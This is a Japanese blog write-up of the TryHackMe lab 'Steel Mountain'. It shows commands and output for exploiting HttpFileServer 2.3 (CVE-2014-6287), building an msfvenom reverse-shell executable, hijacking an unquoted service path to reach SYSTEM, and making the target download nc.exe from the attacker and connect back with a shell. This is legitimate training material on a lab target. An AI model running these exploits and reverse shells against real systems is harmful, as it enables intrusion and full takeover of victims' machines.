【TryHackMe write-up】Steel Mountain

May 01, 2020

はじめに

TryHackMe という Hack the Box のようなサービスを最近やっています。 https://tryhackme.com/

その中の Steel Mountain という machine をやっていきます

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

nmap

root@kali:~# nmap -sV -sC 10.10.217.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 12:23 UTC
Nmap scan report for ip-10-10-217-52.eu-west-1.compute.internal (10.10.217.52)
Host is up (0.00040s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2020-04-30T12:25:06+00:00; +1s from scanner time.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49161/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 02:44:3D:25:E8:22 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:44:3d:25:e8:22 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-30T12:25:01
|_  start_date: 2020-04-30T12:23:07

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.23 seconds

exploit

HttpFileServer 2.3 が動いているので CVE-2014-6287 を利用します https://www.exploit-db.com/exploits/39161

metasploit を使用します

msf5 > search httpfileserver

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

諸々設定して run します

msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.245.227:4444
[*] Using URL: http://0.0.0.0:8080/Xxa80jSiWx
[*] Local IP: http://10.10.245.227:8080/Xxa80jSiWx
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /Xxa80jSiWx
[*] Sending stage (180291 bytes) to 10.10.217.52
[*] Meterpreter session 1 opened (10.10.245.227:4444 -> 10.10.217.52:58069) at 2020-04-30 13:00:00 +0000
[!] Tried to delete %TEMP%\StrHYWOhBpRtio.vbs, unknown result
[*] Server stopped.

meterpreter >

meterpreter のシェルが取れたのでこれで user.txt が取得できます

privilege escalation

PowerUp.ps1 なるものがあるようなので meterpreter から upload します https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 使い方 https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

C:hogehoge > powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”

（省略）

[*] Checking for unquoted service paths...


ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced
                 SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path
                 <HijackPath>
CanRestart     : True

（省略）

以下の用に unquoted service path はそこに別のプログラムを置くことで任意のコマンドを実行できる可能性があります。引用符で囲まれていないプログラムパスの処理問題

また、CanRestart: Trueであることから service をリスタート、すなわち unquoted service paths の部分を利用して配置した任意コマンドを実行できます。

msfvenom で payload を exe の形式で作成して、

root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.245.227 LPORT=1111 -f exe -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: Advanced.exe

作成した Advanced.exe を meterpreter の upload コマンドを通して、C:\Program Files (x86)\IObit\に配置します。

meterpreter > cd "\Program Files (x86)\IObit"
meterpreter > upload Advanced.exe
[*] uploading  : Advanced.exe -> Advanced.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): Advanced.exe -> Advanced.exe
[*] uploaded   : Advanced.exe -> Advanced.exe

以下のコマンドで AdvancedSystemCareService9 をリスタートします

sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

これで root が取れました

root@kali:~# nc -lnvp 1111
listening on [any] 1111 ...
connect to [10.10.245.227] from (UNKNOWN) [10.10.93.43] 50263
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

metasploit なしで攻略してみる

同じものですが、以下の exploit を使います https://www.exploit-db.com/exploits/39161

以下の writeup が役立ちそうです（Hack the Box の wruteup です） https://medium.com/@ranakhalil101/hack-the-box-optimum-writeup-w-o-metasploit-3a912e1c488c

root@kali:~# locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
root@kali:~# cp /usr/share/windows-resources/binaries/nc.exe ./
root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

root@kali:~# nc -lnvp 1112
listening on [any] 1112 ...

shell1 と shell2 で待ち受けて実行します

root@kali:~# python exploit.py 10.10.93.43 8080
root@kali:~# python exploit.py 10.10.93.43 8080

（複数回実行が必要です）

root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.93.43 - - [30/Apr/2020 15:40:02] "GET /nc.exe HTTP/1.1" 200 -

root@kali:~# nc -lnvp 1112
listening on [any] 1112 ...
connect to [10.10.245.227] from (UNKNOWN) [10.10.93.43] 50307
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
whoami
steelmountain\bill

user が取れましたこれ以降はほぼ同じなので割愛します

終わりに

OSCP の Learning Path に乗ってるだけあって metasploit なしの方法もしっかり誘導があって良い感じでした。 unquoted service paths を利用した置き換えは初見だったのでホェーとなりました